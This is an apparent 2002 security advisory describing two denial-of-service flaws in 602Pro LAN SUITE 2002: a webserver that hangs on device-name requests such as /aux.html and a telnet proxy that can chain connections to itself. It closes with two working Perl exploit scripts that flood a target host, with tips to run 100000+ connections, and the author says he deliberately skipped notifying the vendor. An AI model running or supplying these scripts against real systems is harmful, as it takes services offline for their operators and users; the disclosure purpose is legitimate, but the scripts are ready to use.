Advisory: Multiple 602Pro LAN SUITE 2002 Denial of Service Attacks

[Stan Bubrouski <stan () ccs neu edu>]

Date: August 3, 2002
Author: Stan Bubrouski
Product: 602Pro LAN SUITE 2002
Version: 2002
Vendor: Software602, Inc.
Summary: Denial of Service attacks in webserver and telnet proxy

Description: There are two denial of service attacks in
602Pro LAN SUITE 2002 for windows.  The problems are
described below.

Problem 1: Webserver/Webmail windows device name DoS attack

The webserver component of Lan Suite does not filter out
requests for files that contain device names.  This means
that if you request say "/aux.html" the server attemps to
read that device as a file and thus that thread hangs. This
also means memory and CPU are associated with that thread
that cannot be recovered.  By automating connecting and
requesting that file it is possible to cause the Lansuite.exe
to quickly consume hundreds of megabytes of memory and raise
CPU usage to 100% affecting achieving a Denial-of-Service
attack against Lan Suite.  Even after the attack is completed
there is no way to lower the system resources (i.e. MEM, CPU)
until the process is killed.

Problem 2: The telnet proxy is vulnerable to a DoS attack

The telnet proxy allows connections to localhost essentially
allowing you to connect to the proxy through the proxy, without
limit.  For example:

Telnet Gateway ready, enter computer name to connect to.

host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.

host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.

host[:port]: localhost:23
Telnet Gateway ready, enter computer name to connect to.

Automating this process causes the Lansuite.exe process to
consume more and more memory as long as the connection remains
active, thus allowing resource exhaustion, by doing this
hundreds of times.
012345678901234567890123456789012345678901234567890
Solution: Because no support e-mail address or phone number are
available which do not require product registration, I did not report
this to the vendor.  There was a bug report form, but I hate the
idiotic format of these webbased forms and the lack of response you
get from them.  To me it's clear if a vendor cared about the quality of
of its product they would provide a simple e-mail address you could
report problems to without having to pay for registration.  So in other
words, let them burn, I don't care if they don't.

Attached are two small proof of concept exploits for the problems.

#!/usr/bin/perl
#
# lansuite-proxy-DoS.pl - 602Pro LAN SUITE 2002 telnet proxy DoS
# 
# Note: Try very high number of connections and run multiple instances
# of the script for quick results.
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan () ccs neu edu)


if (!$ARGV[2]) {
        print "Usage $0 <hostname> <port> <connections>\n\n";
        exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];


use Net::Telnet ();
$t = new Net::Telnet;
$t->open(Host => $host,Port => $port);

foreach(1...$numc) {
        $t->waitfor('/.*host.*/');
        $t->print('localhost:23');
}

#!/usr/bin/perl
#
# lansuite-webserver-DoS.pl - 602Pro LAN SUITE 2002 webserver DoS
# 
# Note: Try using a connections setting of 100000+ for obvious results
#
# Date: August 3, 2002
# Author: Stan Bubrouski (stan () ccs neu edu)

use IO::Socket;

if (!$ARGV[2]) {
        print "Usage $0 <hostname> <port> <connections>\n\n";
        exit();
}

$host = $ARGV[0];
$port = $ARGV[1];
$numc = $ARGV[2];


foreach(1...$numc) {
        $sock = IO::Socket::INET->new( PeerAddr => "$host", Proto => "tcp", PeerPort => "$port");
        print $sock "GET /aux.html HTTP/1.0\r\n";
}